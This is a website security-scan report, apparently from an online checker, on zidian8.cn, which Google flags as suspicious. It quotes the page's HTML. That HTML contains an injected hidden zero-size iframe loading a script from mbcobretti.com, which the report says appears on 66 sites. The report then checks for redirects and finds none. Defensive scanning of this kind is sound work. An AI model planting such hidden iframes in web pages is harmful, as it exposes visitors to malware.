Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zidian8.cn
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://zidian8.cn/ | 200 OK Content-Length: 4718 Content-Type: text/html | malicious |
Page code contains blacklisted domain: mbcobretti.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> ×Öµä´ÊµäÔÚÏß </title></head> <body><iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter></iframe> <form name="form1" method="post" action="Default.aspx" id="form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPD ...[4892 bytes skipped]... Malicious iFrame found. The same iFrame was found in 66 websites. size: 0x0 src: http://mbcobretti.com/hydra.php This URL is marked by Google as suspicious <iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter> | ||
http://zidian8.cn/WebResource.axd?d=PbbSuRInp9dFvcyAIX7Ki4cOsHKkfwzznEAvtShKBjyVK6LZqYMplJq_XryMcaG8skjek0k7Z2mY1y-6wk9defvozXY1&t=635359416454687500 | 200 OK Content-Length: 20794 Content-Type: application/x-javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19495 Content-Type: text/javascript | clean |
http://zidian8.cn/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zidian8.cn
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 27 Jan 2015 23:49:24 GMT
Server: Microsoft-IIS/6.0
Content-Length: 4718
Content-Type: text/html; charset=gb2312
Set-Cookie: .ASPXANONYMOUS=SJT2tx1x0AEkAAAAMWY1ODQ0ZjItMjc5NS00ZjMyLWE1ZTQtMGMzYzAwYTAzZmMy0; expires=Tue, 07-Apr-2015 10:29:24 GMT; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
...4718 bytes of data.
GET / HTTP/1.1
Host: zidian8.cn
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 27 Jan 2015 23:49:24 GMT
Server: Microsoft-IIS/6.0
Content-Length: 4718
Content-Type: text/html; charset=gb2312
Set-Cookie: .ASPXANONYMOUS=SJT2tx1x0AEkAAAAMWY1ODQ0ZjItMjc5NS00ZjMyLWE1ZTQtMGMzYzAwYTAzZmMy0; expires=Tue, 07-Apr-2015 10:29:24 GMT; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
...4718 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: zidian8.cn
Referer: http://www.google.com/search?q=zidian8.cn
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zidian8.cn
Referer: http://www.google.com/search?q=zidian8.cn
Result:
The result is similar to the first query. There are no suspicious redirects found.